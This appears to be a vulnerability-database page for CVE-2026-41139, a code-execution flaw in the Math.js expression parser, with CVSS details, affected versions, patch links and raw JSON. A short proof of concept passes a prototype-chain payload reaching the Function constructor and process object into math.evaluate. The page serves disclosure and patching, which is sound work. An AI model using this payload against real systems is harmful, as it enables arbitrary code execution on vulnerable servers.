Security Vulnerability Report
CVE-2026-41139 CVSS 8.8 HIGH

CVE-2026-41139

Published: 2026-05-07 06:16:04
Last Modified: 2026-05-08 17:06:04

Description

Math.js is an extensive math library for JavaScript and Node.js. From version 13.1.0 to before version 15.2.0, arbitrary JavaScript can be executed via the expression parser of mathjs. This issue has been patched in version 15.2.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:* - VULNERABLE
Math.js >= 13.1.0, < 15.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-41139 (Node.js; the page's code, reflowed)
const math = require('mathjs');

// Malicious payload attempting to execute arbitrary JS.
// In vulnerable versions, the expression parser may allow access to the
// Function constructor through the prototype chain.
const maliciousPayload = "constructor.constructor('return process')().exit()";

try {
  console.log("Testing payload...");
  math.evaluate(maliciousPayload);
  // Note: if the payload runs, process.exit() ends the process before this line.
  console.log("Exploit successful: Process exited.");
} catch (error) {
  // On patched versions (>= 15.2.0) the parser rejects the access and throws.
  console.log("Exploit failed or patched:", error.message);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41139", "sourceIdentifier": "[email protected]", "published": "2026-05-07T06:16:04.273", "lastModified": "2026-05-08T17:06:03.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Math.js is an extensive math library for JavaScript and Node.js. From version 13.1.0 to before version 15.2.0, arbitrary JavaScript can be executed via the expression parser of mathjs. This issue has been patched in version 15.2.0."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.1.0", "versionEndExcluding": "15.2.0", "matchCriteriaId": "9F4FB8F3-ED49-4781-80E5-90123FD1A6BE"}]}]}], "references": [{"url": "https://github.com/josdejong/mathjs/commit/0aee2f61866e35ffa0aef915221cdf6b026ffdd4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/josdejong/mathjs/commit/bcf0da46f0b8577ec03c9ecd7bff8b5c2543a611", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/josdejong/mathjs/pull/3656", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/josdejong/mathjs/releases/tag/v15.2.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/josdejong/mathjs/security/advisories/GHSA-5v89-rwgr-qj6g", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}